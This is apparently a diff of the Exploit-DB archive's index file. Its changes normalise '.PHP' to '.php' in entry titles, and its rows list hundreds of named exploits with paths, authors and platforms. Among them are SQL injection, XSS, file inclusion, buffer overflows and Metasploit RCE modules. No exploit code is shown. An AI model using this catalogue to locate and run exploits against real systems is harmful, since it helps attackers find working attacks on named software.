28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow",2013-09-23,metasploit,windows,remote,6502 28481,platforms/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069)",2013-09-23,metasploit,windows,remote,0 @@ -25530,20 +25530,20 @@ id,file,description,date,author,platform,type,port 28483,platforms/php/remote/28483.rb,"GLPI install.php Remote Command Execution",2013-09-23,metasploit,php,remote,80 28484,platforms/hardware/remote/28484.rb,"Linksys WRT110 - Remote Command Execution",2013-09-23,metasploit,hardware,remote,0 28485,platforms/php/webapps/28485.txt,"WordPress NOSpamPTI Plugin - Blind SQL Injection",2013-09-23,"Alexandro Silva",php,webapps,0 -28486,platforms/php/webapps/28486.txt,"In-Portal In-Link 2.3.4 ADODB_DIR.PHP Remote File Include Vulnerability",2006-09-04,"Saudi Hackrz",php,webapps,0 +28486,platforms/php/webapps/28486.txt,"In-Portal In-Link 2.3.4 ADODB_DIR.php Remote File Include Vulnerability",2006-09-04,"Saudi Hackrz",php,webapps,0 28487,platforms/php/webapps/28487.txt,"PHP-Nuke MyHeadlines 4.3.1 Module Cross-Site Scripting Vulnerability",2006-09-04,"Thomas Pollet",php,webapps,0 -28488,platforms/php/webapps/28488.php,"PHP-Proxima 6.0 BB_Smilies.PHP Local File Include Vulnerability",2006-09-04,Kacper,php,webapps,0 +28488,platforms/php/webapps/28488.php,"PHP-Proxima 6.0 BB_Smilies.php Local File Include Vulnerability",2006-09-04,Kacper,php,webapps,0 28489,platforms/windows/remote/28489.txt,"Easy Address Book Web Server 1.2 - Remote Format String Vulnerability",2006-09-04,"Revnic Vasile",windows,remote,0 28490,platforms/php/webapps/28490.txt,"SoftBB 0.1 Page Parameter Cross-Site Scripting Vulnerability",2006-09-05,ThE__LeO,php,webapps,0 28491,platforms/multiple/dos/28491.txt,"DSocks 1.3 Name Variable Buffer Overflow Vulnerability",2006-09-05,"Michael Adams",multiple,dos,0 -28492,platforms/php/webapps/28492.txt,"Uni-vert PhpLeague 0.82 Joueurs.PHP SQL Injection Vulnerability",2006-09-06,DrEiNsTeIn,php,webapps,0 +28492,platforms/php/webapps/28492.txt,"Uni-vert PhpLeague 0.82 Joueurs.php SQL Injection Vulnerability",2006-09-06,DrEiNsTeIn,php,webapps,0 28493,platforms/php/webapps/28493.txt,"PHP-Nuke Book Catalog Module 1.0 - 'upload.php' Arbitrary File Upload Vulnerability",2006-09-07,osm,php,webapps,0 -28494,platforms/php/webapps/28494.txt,"AckerTodo 4.0 Index.PHP Cross-Site Scripting Vulnerability",2006-09-07,viz.security,php,webapps,0 +28494,platforms/php/webapps/28494.txt,"AckerTodo 4.0 Index.php Cross-Site Scripting Vulnerability",2006-09-07,viz.security,php,webapps,0 28495,platforms/php/webapps/28495.txt,"TWiki 4.0.x Viewfile Directory Traversal Vulnerability",2006-09-07,"Peter Thoeny",php,webapps,0 -28496,platforms/php/webapps/28496.php,"PHP-Fusion 6.0.x News.PHP SQL Injection Vulnerability",2006-09-07,rgod,php,webapps,0 +28496,platforms/php/webapps/28496.php,"PHP-Fusion 6.0.x News.php SQL Injection Vulnerability",2006-09-07,rgod,php,webapps,0 28497,platforms/php/webapps/28497.txt,"Vikingboard Viking board 0.1b help.php act Parameter XSS",2006-09-08,Hessam-x,php,webapps,0 28498,platforms/php/webapps/28498.txt,"Vikingboard Viking board 0.1b report.php p Parameter XSS",2006-09-08,Hessam-x,php,webapps,0 -28499,platforms/php/webapps/28499.txt,"Vikingboard 0.1 Topic.PHP SQL Injection Vulnerability",2006-09-08,Hessam-x,php,webapps,0 +28499,platforms/php/webapps/28499.txt,"Vikingboard 0.1 Topic.php SQL Injection Vulnerability",2006-09-08,Hessam-x,php,webapps,0 28500,platforms/windows/remote/28500.txt,"Microsoft Indexing Service Query Validation Cross-Site Scripting Vulnerability",2006-09-12,"Eiji James Yoshida",windows,remote,0 28501,platforms/multiple/remote/28501.xml,"Sage 1.3.6 Input Validation Vulnerability",2006-09-08,pdp,multiple,remote,0 28502,platforms/php/webapps/28502.txt,"TextAds delete.php id Parameter XSS",2006-09-09,s3rv3r_hack3r,php,webapps,0 @@ -25561,9 +25561,9 @@ id,file,description,date,author,platform,type,port 28515,platforms/php/webapps/28515.txt,"IDevSpot iSupport 1.8 rightbar.php suser Parameter XSS",2006-09-12,s3rv3r_hack3r,php,webapps,0 28516,platforms/php/webapps/28516.txt,"IDevSpot iSupport 1.8 open_tickets.php ticket_id Parameter XSS",2006-09-12,s3rv3r_hack3r,php,webapps,0 28517,platforms/php/webapps/28517.txt,"IDevSpot iSupport 1.8 index.php cons_page_title Parameter XSS",2006-09-12,s3rv3r_hack3r,php,webapps,0 -28518,platforms/php/webapps/28518.txt,"IDevSpot iSupport 1.8 Index.PHP Remote File Include Vulnerability",2006-09-12,s3rv3r_hack3r,php,webapps,0 -28519,platforms/php/webapps/28519.txt,"WM-News 0.5 Print.PHP Local File Include Vulnerability",2006-09-12,"Daftrix Security",php,webapps,0 -28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 Childwindow.Inc.PHP Remote File Include Vulnerability",2006-09-12,SHiKaA,php,webapps,0 +28518,platforms/php/webapps/28518.txt,"IDevSpot iSupport 1.8 Index.php Remote File Include Vulnerability",2006-09-12,s3rv3r_hack3r,php,webapps,0 +28519,platforms/php/webapps/28519.txt,"WM-News 0.5 Print.php Local File Include Vulnerability",2006-09-12,"Daftrix Security",php,webapps,0 +28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 Childwindow.Inc.php Remote File Include Vulnerability",2006-09-12,SHiKaA,php,webapps,0 28521,platforms/osx/dos/28521.txt,"Apple QuickTime 6/7 FLC Movie COLOR_64 Chunk Overflow",2006-09-12,Sowhat,osx,dos,0 28522,platforms/php/webapps/28522.txt,"Telekorn Signkorn Guestbook 1.x index.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 28523,platforms/php/webapps/28523.txt,"Telekorn Signkorn Guestbook 1.x includes/functions.gb.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 @@ -25586,8 +25586,8 @@ id,file,description,date,author,platform,type,port 28540,platforms/php/webapps/28540.txt,"Telekorn Signkorn Guestbook 1.x admin/config.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 28541,platforms/php/webapps/28541.txt,"Telekorn Signkorn Guestbook 1.x admin/admin.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 28542,platforms/multiple/dos/28542.pl,"Verso NetPerformer Frame Relay Access Device Telnet Buffer Overflow Vulnerability",2006-09-13,"Arif Jatmoko",multiple,dos,0 -28543,platforms/php/webapps/28543.txt,"ForumJBC 4.0 Haut.PHP Cross-Site Scripting Vulnerability",2006-09-13,ThE__LeO,php,webapps,0 -28544,platforms/php/webapps/28544.txt,"K2News Management 1.3 Ratings.PHP Cross-Site Scripting Vulnerability",2006-09-13,meto5757,php,webapps,0 +28543,platforms/php/webapps/28543.txt,"ForumJBC 4.0 Haut.php Cross-Site Scripting Vulnerability",2006-09-13,ThE__LeO,php,webapps,0 +28544,platforms/php/webapps/28544.txt,"K2News Management 1.3 Ratings.php Cross-Site Scripting Vulnerability",2006-09-13,meto5757,php,webapps,0 28545,platforms/php/webapps/28545.txt,"e107 website system 0.7.5 contact.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 28546,platforms/php/webapps/28546.txt,"e107 website system 0.7.5 download.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 28547,platforms/php/webapps/28547.txt,"e107 website system 0.7.5 admin.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 @@ -25600,7 +25600,7 @@ id,file,description,date,author,platform,type,port 28556,platforms/php/webapps/28556.txt,"e107 website system 0.7.5 user.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 28557,platforms/php/webapps/28557.txt,"X2CRM 3.4.1 - Multiple Vulnerabilities",2013-09-25,"High-Tech Bridge SA",php,webapps,80 28558,platforms/linux/webapps/28558.txt,"ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure Vulnerability",2013-09-25,"Yann CAM",linux,webapps,0 -28658,platforms/php/webapps/28658.txt,"MyPhotos 0.1.3b Index.PHP Remote File Include Vulnerability",2006-09-23,Root3r_H3ll,php,webapps,0 +28658,platforms/php/webapps/28658.txt,"MyPhotos 0.1.3b Index.php Remote File Include Vulnerability",2006-09-23,Root3r_H3ll,php,webapps,0 28659,platforms/palm_os/webapps/28659.txt,"Jamroom 3.0.16 Login.php Cross-Site Scripting Vulnerability",2006-09-24,meto5757,palm_os,webapps,0 28660,platforms/php/webapps/28660.php,"CPanel 5-10 - SUID Wrapper Remote Privilege Escalation Vulnerability",2006-09-24,"Nima Salehi",php,webapps,0 28560,platforms/php/webapps/28560.txt,"Piwigo 2.5.2 - Cross-Site Scripting",2013-09-26,Arsan,php,webapps,0 @@ -25609,10 +25609,10 @@ id,file,description,date,author,platform,type,port 28563,platforms/multiple/webapps/28563.txt,"Posnic Stock Management System 1.02 - Multiple Vulnerabilities",2013-09-26,"Sarahma Security",multiple,webapps,0 28564,platforms/php/webapps/28564.txt,"ArticleSetup - Multiple Vulnerabilities",2013-09-26,DevilScreaM,php,webapps,0 38990,platforms/php/webapps/38990.txt,"ArticleSetup Article Script 1.00 - SQL Injection Vulnerability",2015-12-15,"Linux Zone Research Team",php,webapps,80 -28565,platforms/php/webapps/28565.txt,"PHP Event Calendar 1.4/1.5 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,"NR Nandini",php,webapps,0 +28565,platforms/php/webapps/28565.txt,"PHP Event Calendar 1.4/1.5 Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,"NR Nandini",php,webapps,0 28566,platforms/asp/webapps/28566.txt,"Snitz Forums 2000 Forum.ASP Cross-Site Scripting Vulnerability",2006-09-13,ajann,asp,webapps,0 28567,platforms/php/webapps/28567.txt,"NX5Linkx 1.0 - Multiple SQL Injection Vulnerabilities",2006-09-13,"Aliaksandr Hartsuyeu",php,webapps,0 -28568,platforms/php/webapps/28568.txt,"NX5Linkx 1.0 Links.PHP HTTP Response Splitting Vulnerability",2006-09-13,"Aliaksandr Hartsuyeu",php,webapps,0 +28568,platforms/php/webapps/28568.txt,"NX5Linkx 1.0 Links.php HTTP Response Splitting Vulnerability",2006-09-13,"Aliaksandr Hartsuyeu",php,webapps,0 28569,platforms/php/webapps/28569.txt,"ActiveCampaign KnowledgeBuilder 2.2 - Remote File Include Vulnerability",2006-09-14,igi,php,webapps,0 28570,platforms/cgi/webapps/28570.txt,"Mailman 2.1.x - Multiple Input Validation Vulnerabilities",2006-09-14,"Moritz Naumann",cgi,webapps,0 28571,platforms/php/webapps/28571.txt,"DCP-Portal 6.0 admin/inc/footer.inc.php Multiple Parameter XSS",2006-09-14,"HACKERS PAL",php,webapps,0 @@ -25623,8 +25623,8 @@ id,file,description,date,author,platform,type,port 28576,platforms/osx/local/28576.txt,"Apple Mac OS X 10.x KExtLoad Format String Weakness",2006-09-14,"Adriel T. Desautels",osx,local,0 28577,platforms/asp/webapps/28577.txt,"ClickBlog! 2.0 Default.ASP SQL Injection Vulnerability",2006-09-14,ajann,asp,webapps,0 28578,platforms/osx/dos/28578.txt,"Apple Mac OS X 10.x KExtLoad Buffer Overflow Weakness",2006-09-14,"Adriel T. Desautels",osx,dos,0 -28579,platforms/php/webapps/28579.txt,"MyBulletinBoard 1.x Index.PHP Cross-Site Scripting Vulnerability",2006-09-15,"HACKERS PAL",php,webapps,0 -28580,platforms/php/webapps/28580.txt,"NextAge Cart Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,php,webapps,0 +28579,platforms/php/webapps/28579.txt,"MyBulletinBoard 1.x Index.php Cross-Site Scripting Vulnerability",2006-09-15,"HACKERS PAL",php,webapps,0 +28580,platforms/php/webapps/28580.txt,"NextAge Cart Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,php,webapps,0 28581,platforms/php/webapps/28581.txt,"Jupiter CMS 1.1.4/1.1.5 galleryuploadfunction.php Arbitrary File Upload",2006-09-15,"HACKERS PAL",php,webapps,0 28582,platforms/php/webapps/28582.txt,"Jupiter CMS 1.1.4/1.1.5 modules/blocks.php Multiple Parameter XSS",2006-09-15,"HACKERS PAL",php,webapps,0 28583,platforms/php/webapps/28583.txt,"Jupiter CMS 1.1.4/1.1.5 modules/register.php Multiple Parameter XSS",2006-09-15,"HACKERS PAL",php,webapps,0 @@ -25638,17 +25638,17 @@ id,file,description,date,author,platform,type,port 28591,platforms/php/webapps/28591.php,"PHP-post Web Forum 0.x.1.0 profile.php Multiple Parameter SQL Injection",2006-09-16,"HACKERS PAL",php,webapps,0 28592,platforms/php/webapps/28592.txt,"PHP-post Web Forum 0.x.1.0 pm.php replyuser Parameter XSS",2006-09-16,"HACKERS PAL",php,webapps,0 28593,platforms/asp/webapps/28593.txt,"ZilekPortal 1.0 Haberdetay.ASP SQL Injection Vulnerability",2006-09-16,chernobiLe,asp,webapps,0 -28594,platforms/php/webapps/28594.txt,"Artmedic Links 5.0 Index.PHP Remote File Include Vulnerability",2006-09-16,botan,php,webapps,0 +28594,platforms/php/webapps/28594.txt,"Artmedic Links 5.0 Index.php Remote File Include Vulnerability",2006-09-16,botan,php,webapps,0 28595,platforms/linux/remote/28595.txt,"BusyBox 1.01 HTTPD Directory Traversal Vulnerability",2006-09-16,bug-finder,linux,remote,0 -28596,platforms/php/webapps/28596.txt,"MyBulletinBoard 1.2 Generic_Error.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-09-18,"HACKERS PAL",php,webapps,0 +28596,platforms/php/webapps/28596.txt,"MyBulletinBoard 1.2 Generic_Error.php Multiple Cross-Site Scripting Vulnerabilities",2006-09-18,"HACKERS PAL",php,webapps,0 28597,platforms/asp/webapps/28597.txt,"ECardPro 2.0 - Search.ASP SQL Injection Vulnerability",2006-09-18,ajann,asp,webapps,0 28598,platforms/php/webapps/28598.txt,"IDevSpot BizDirectory 1.9 - Multiple Cross-Site Scripting Vulnerabilities",2006-09-18,s3rv3r_hack3r,php,webapps,0 -28599,platforms/php/webapps/28599.txt,"NixieAffiliate 1.9 Lostpassword.PHP Cross-Site Scripting Vulnerability",2006-09-18,s3rv3r_hack3r,php,webapps,0 +28599,platforms/php/webapps/28599.txt,"NixieAffiliate 1.9 Lostpassword.php Cross-Site Scripting Vulnerability",2006-09-18,s3rv3r_hack3r,php,webapps,0 28600,platforms/asp/webapps/28600.txt,"EShoppingPro 1.0 - Search_Run.ASP SQL Injection Vulnerability",2006-09-18,ajann,asp,webapps,0 -28601,platforms/php/webapps/28601.txt,"PT News 1.7.8 - Search.PHP Cross-Site Scripting Vulnerability",2006-09-18,Snake,php,webapps,0 +28601,platforms/php/webapps/28601.txt,"PT News 1.7.8 - Search.php Cross-Site Scripting Vulnerability",2006-09-18,Snake,php,webapps,0 28602,platforms/multiple/remote/28602.txt,"OSU HTTP Server 3.10/3.11 - Multiple Information Disclosure Vulnerabilities",2006-09-19,"Julio Cesar Fort",multiple,remote,0 -28603,platforms/php/webapps/28603.txt,"Innovate Portal 2.0 Index.PHP Cross-Site Scripting Vulnerability",2006-09-19,meto5757,php,webapps,0 -28604,platforms/php/webapps/28604.txt,"ESyndiCat 1.5 - Search.PHP Cross-Site Scripting Vulnerability",2006-09-19,meto5757,php,webapps,0 +28603,platforms/php/webapps/28603.txt,"Innovate Portal 2.0 Index.php Cross-Site Scripting Vulnerability",2006-09-19,meto5757,php,webapps,0 +28604,platforms/php/webapps/28604.txt,"ESyndiCat 1.5 - Search.php Cross-Site Scripting Vulnerability",2006-09-19,meto5757,php,webapps,0 28605,platforms/jsp/webapps/28605.txt,"NeoSys Neon Webmail for Java 5.06/5.07 downloadfile Servlet Traversal Arbitrary File Access",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28606,platforms/jsp/webapps/28606.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updatemail Servlet Arbitrary Mail Message Manipulation",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28607,platforms/jsp/webapps/28607.txt,"NeoSys Neon Webmail for Java 5.06/5.07 addrlist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0 @@ -25660,7 +25660,7 @@ id,file,description,date,author,platform,type,port 28613,platforms/php/webapps/28613.txt,"RedBLoG 0.5 common.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 28614,platforms/php/webapps/28614.txt,"RedBLoG 0.5 admin/index.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 28615,platforms/asp/webapps/28615.txt,"DotNetNuke <= 4.0 HTML Injection Vulnerability",2006-09-17,"Secure Shapes",asp,webapps,0 -28616,platforms/php/webapps/28616.txt,"A.I-Pifou 1.8 Choix_langue.PHP Directory Traversal Vulnerability",2006-09-20,cdg393,php,webapps,0 +28616,platforms/php/webapps/28616.txt,"A.I-Pifou 1.8 Choix_langue.php Directory Traversal Vulnerability",2006-09-20,cdg393,php,webapps,0 28617,platforms/php/webapps/28617.txt,"Grayscale BandSite CMS 1.1 help_news.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 28618,platforms/php/webapps/28618.txt,"Grayscale BandSite CMS 1.1 help_merch.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 28619,platforms/php/webapps/28619.txt,"Grayscale BandSite CMS 1.1 help_mp3.php max_file_size_purdy Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 @@ -25689,9 +25689,9 @@ id,file,description,date,author,platform,type,port 28642,platforms/windows/remote/28642.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Audit Event System Unspecified Replay Attack",2006-09-21,"Patrick Webster",windows,remote,0 28643,platforms/osx/remote/28643.txt,"Apple Mac OS X 10.x AirPort Wireless Driver Multiple Buffer Overflow Vulnerabilities",2006-09-21,"David Maynor",osx,remote,0 28644,platforms/php/webapps/28644.txt,"Google Mini Search Appliance 4.4.102.M.36 Information Disclosure Vulnerability",2006-09-22,"Patrick Webster",php,webapps,0 -28645,platforms/php/webapps/28645.txt,"CakePHP 1.1.7.3363 Vendors.PHP Directory Traversal Vulnerability",2006-09-22,"James Bercegay",php,webapps,0 +28645,platforms/php/webapps/28645.txt,"CakePHP 1.1.7.3363 Vendors.php Directory Traversal Vulnerability",2006-09-22,"James Bercegay",php,webapps,0 28646,platforms/php/webapps/28646.txt,"mysource 2.14.8/2.16 - Multiple Vulnerabilities",2006-09-22,"Patrick Webster",php,webapps,0 -28647,platforms/php/webapps/28647.txt,"PLESK 7.5/7.6 - Filemanager.PHP Directory Traversal Vulnerability",2006-09-22,GuanYu,php,webapps,0 +28647,platforms/php/webapps/28647.txt,"PLESK 7.5/7.6 - Filemanager.php Directory Traversal Vulnerability",2006-09-22,GuanYu,php,webapps,0 28648,platforms/freebsd/dos/28648.c,"FreeBSD 5.x I386_Set_LDT() Multiple Local Denial of Service Vulnerabilities",2006-09-23,"Adriano Lima",freebsd,dos,0 28649,platforms/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,hardware,webapps,0 28650,platforms/windows/dos/28650.py,"KMPlayer 3.7.0.109 - (.wav) Crash PoC",2013-09-30,xboz,windows,dos,0 @@ -25706,10 +25706,10 @@ id,file,description,date,author,platform,type,port 28655,platforms/multiple/local/28655.rb,"Nodejs js-yaml load() Code Exec",2013-09-30,metasploit,multiple,local,0 28656,platforms/php/webapps/28656.txt,"SimpleRisk 20130915-01 - Multiple Vulnerabilities",2013-09-30,"Ryan Dewhurst",php,webapps,80 28657,platforms/linux/local/28657.c,"glibc and eglibc 2.5/2.7/2.13 - Buffer Overflow Vulnerability",2013-09-30,"Hector Marco and Ismael Ripoll",linux,local,0 -28661,platforms/php/webapps/28661.txt,"ToendaCMS 1.0.4 Media.PHP Directory Traversal Vulnerability",2006-09-24,MoHaJaLi,php,webapps,0 +28661,platforms/php/webapps/28661.txt,"ToendaCMS 1.0.4 Media.php Directory Traversal Vulnerability",2006-09-24,MoHaJaLi,php,webapps,0 28662,platforms/php/webapps/28662.txt,"PhotoStore details.php - gid Parameter XSS",2006-09-25,meto5757,php,webapps,0 28663,platforms/php/webapps/28663.txt,"PhotoStore view_photog.php - photogid Parameter XSS",2006-09-25,meto5757,php,webapps,0 -28664,platforms/php/webapps/28664.txt,"Opial AV Download Management 1.0 Index.PHP Cross-Site Scripting Vulnerability",2006-09-25,meto5757,php,webapps,0 +28664,platforms/php/webapps/28664.txt,"Opial AV Download Management 1.0 Index.php Cross-Site Scripting Vulnerability",2006-09-25,meto5757,php,webapps,0 28665,platforms/php/webapps/28665.txt,"WWWThreads 5.4 Cat Parameter Multiple Cross-Site Scripting Vulnerabilities",2006-09-25,Root3r_H3ll,php,webapps,0 28666,platforms/multiple/dos/28666.txt,"Call of Duty Server 4.1.x Callvote Map Command Remote Buffer Overflow Vulnerability",2006-09-25,"Luigi Auriemma",multiple,dos,0 28667,platforms/php/webapps/28667.txt,"BirdBlog 1.x comment.php entryid Parameter XSS",2006-09-25,Root3r_H3ll,php,webapps,0 @@ -25717,21 +25717,21 @@ id,file,description,date,author,platform,type,port 28669,platforms/php/webapps/28669.txt,"BirdBlog 1.x user.php uid Parameter XSS",2006-09-25,Root3r_H3ll,php,webapps,0 28670,platforms/php/webapps/28670.txt,"DanPHPSupport 0.5 index.php page Parameter XSS",2006-09-25,You_You,php,webapps,0 28671,platforms/php/webapps/28671.txt,"DanPHPSupport 0.5 admin.php do Parameter XSS",2006-09-25,You_You,php,webapps,0 -28672,platforms/php/webapps/28672.pl,"BBSNew 2.0.1 Index2.PHP Remote File Include Vulnerability",2006-09-25,Root3r_H3ll,php,webapps,0 -28673,platforms/php/webapps/28673.txt,"Exporia 0.3 Common.PHP Remote File Include Vulnerability",2006-09-25,Root3r_H3ll,php,webapps,0 +28672,platforms/php/webapps/28672.pl,"BBSNew 2.0.1 Index2.php Remote File Include Vulnerability",2006-09-25,Root3r_H3ll,php,webapps,0 +28673,platforms/php/webapps/28673.txt,"Exporia 0.3 Common.php Remote File Include Vulnerability",2006-09-25,Root3r_H3ll,php,webapps,0 28674,platforms/php/webapps/28674.pl,"Back-End CMS 0.4.5 admin/index.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28675,platforms/php/webapps/28675.txt,"Back-End CMS 0.4.5 Facts.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28676,platforms/php/webapps/28676.txt,"Back-End CMS 0.4.5 - search.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28725,platforms/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 - Cross-Site Scripting Vulnerability",2006-09-28,"ILION Research",multiple,remote,0 28726,platforms/multiple/dos/28726.pl,"OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service Vulnerability",2006-09-28,"Noam Rathaus",multiple,dos,0 -28679,platforms/multiple/dos/28679.txt,"Evince PDF Reader - 2.32.0.145 (Windows) and 3.4.0 (Linux) - Denial of Service",2013-10-02,Deva,multiple,dos,0 +28679,platforms/multiple/dos/28679.txt,"Evince PDF Reader 2.32.0.145 (Windows) / 3.4.0 (Linux) - Denial of Service",2013-10-02,Deva,multiple,dos,0 28680,platforms/linux/local/28680.txt,"PinApp Mail-SeCure 3.70 - Access Control Failure",2013-10-02,"Core Security",linux,local,0 28681,platforms/windows/remote/28681.rb,"freeFTPd PASS Command Buffer Overflow",2013-10-02,metasploit,windows,remote,21 28682,platforms/windows/remote/28682.rb,"Micorosft Internet Explorer SetMouseCapture Use-After-Free",2013-10-02,metasploit,windows,remote,0 28683,platforms/linux/dos/28683.txt,"HylaFAX+ 5.2.4 - 5.5.3 - Buffer Overflow",2013-10-02,"Dennis Jenkins",linux,dos,0 28684,platforms/php/webapps/28684.txt,"Gnew 2013.1 - Multiple Vulnerabilities",2013-10-02,"High-Tech Bridge SA",php,webapps,80 28685,platforms/php/webapps/28685.txt,"GLPI 0.84.1 - Multiple Vulnerabilities",2013-10-02,"High-Tech Bridge SA",php,webapps,0 -28686,platforms/php/webapps/28686.txt,"My-BIC 0.6.5 - Mybic_Server.PHP Remote File Include Vulnerability",2006-09-25,Root3r_H3ll,php,webapps,0 +28686,platforms/php/webapps/28686.txt,"My-BIC 0.6.5 - Mybic_Server.php Remote File Include Vulnerability",2006-09-25,Root3r_H3ll,php,webapps,0 28687,platforms/php/webapps/28687.txt,"php_news 2.0 user_user.php language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28688,platforms/php/webapps/28688.txt,"php_news 2.0 admin/news.php language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28689,platforms/php/webapps/28689.txt,"php_news 2.0 admin/catagory.php language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 @@ -25753,29 +25753,29 @@ id,file,description,date,author,platform,type,port 28735,platforms/windows/dos/28735.pl,"MailEnable 2.x - SMTP NTLM Authentication - Multiple Vulnerabilities",2006-11-29,mu-b,windows,dos,0 29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 SurgeFTPMGR.CGI Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0 29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 ProductDetails.ASP SQL Injection Vulnerability",2006-12-11,ajann,asp,webapps,0 -28728,platforms/php/webapps/28728.txt,"Geotarget Script.PHP Remote File Include Vulnerability",2006-09-29,"RaVeR shi mozi",php,webapps,0 +28728,platforms/php/webapps/28728.txt,"Geotarget Script.php Remote File Include Vulnerability",2006-09-29,"RaVeR shi mozi",php,webapps,0 28708,platforms/php/webapps/28708.txt,"elproLOG MONITOR WebAccess 2.1 - Multiple Vulnerabilities",2013-10-04,Vulnerability-Lab,php,webapps,80 28709,platforms/php/webapps/28709.txt,"FlashChat 6.0.2-6.0.8 - Arbitrary File Upload Vulnerability",2013-10-04,x-hayben21,php,webapps,80 28710,platforms/osx/remote/28710.txt,"Skype Technologies Skype 1.5 NSRunAlertPanel Remote Format String Vulnerability",2006-09-26,"Tom Ferris",osx,remote,0 -28711,platforms/php/webapps/28711.txt,"PHP Invoice 2.2 Home.PHP Cross-Site Scripting Vulnerability",2006-09-26,meto5757,php,webapps,0 +28711,platforms/php/webapps/28711.txt,"PHP Invoice 2.2 Home.php Cross-Site Scripting Vulnerability",2006-09-26,meto5757,php,webapps,0 28712,platforms/php/webapps/28712.txt,"CMS Formulasi 2.07 - Multiple Vulnerabilities",2013-10-04,"Sarahma Security",php,webapps,80 28713,platforms/php/remote/28713.php,"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE",2013-10-04,rgod,php,remote,0 -28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development Index.PHP3 - Remote File Include Vulnerability",2006-09-27,rUnViRuS,php,webapps,0 +28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development Index.php3 - Remote File Include Vulnerability",2006-09-27,rUnViRuS,php,webapps,0 29274,platforms/php/webapps/29274.html,"Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability",2013-10-29,"Marcela Benetrix",php,webapps,80 -28716,platforms/php/webapps/28716.txt,"MKPortal 1.0/1.1 PMPopup.PHP Cross-Site Scripting Vulnerability",2006-09-27,HanowarS,php,webapps,0 +28716,platforms/php/webapps/28716.txt,"MKPortal 1.0/1.1 PMPopup.php Cross-Site Scripting Vulnerability",2006-09-27,HanowarS,php,webapps,0 29279,platforms/php/webapps/29279.txt,"Olat CMS 7.8.0.1 - Persistent XSS",2013-10-29,Vulnerability-Lab,php,webapps,0 28718,platforms/freebsd/local/28718.c,"FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation Exploit",2013-10-04,CurcolHekerLink,freebsd,local,0 28719,platforms/php/webapps/28719.txt,"VirtueMart Joomla ECommerce Edition 1.0.11 - Multiple Input Validation Vulnerabilities",2006-09-27,"Adrian Castro",php,webapps,0 -28720,platforms/php/webapps/28720.txt,"Web//News 1.4 Parser.PHP Remote File Include Vulnerability",2006-09-27,ThE-WoLf-KsA,php,webapps,0 +28720,platforms/php/webapps/28720.txt,"Web//News 1.4 Parser.php Remote File Include Vulnerability",2006-09-27,ThE-WoLf-KsA,php,webapps,0 28721,platforms/php/webapps/28721.txt,"Red Mombin 0.7 index.php Unspecified XSS",2006-09-22,"Armorize Technologies",php,webapps,0 28722,platforms/php/webapps/28722.txt,"Red Mombin 0.7 process_login.php Unspecified XSS",2006-09-22,"Armorize Technologies",php,webapps,0 28723,platforms/php/webapps/28723.txt,"Aanval 7.1 build 70151 - Multiple Vulnerabilities",2013-10-04,xistence,php,webapps,80 28724,platforms/windows/remote/28724.rb,"SIEMENS Solid Edge ST4 SEListCtrlX - ActiveX Remote Code Execution",2013-10-04,metasploit,windows,remote,0 -28736,platforms/php/webapps/28736.txt,"DeluxeBB 1.09 Sig.PHP Remote File Include Vulnerability",2006-10-02,r0ut3r,php,webapps,0 -28737,platforms/php/webapps/28737.txt,"PHP Web Scripts Easy Banner Functions.PHP Remote File Include Vulnerability",2006-10-02,"abu ahmed",php,webapps,0 -28738,platforms/php/webapps/28738.txt,"Digishop 4.0 Cart.PHP Cross-Site Scripting 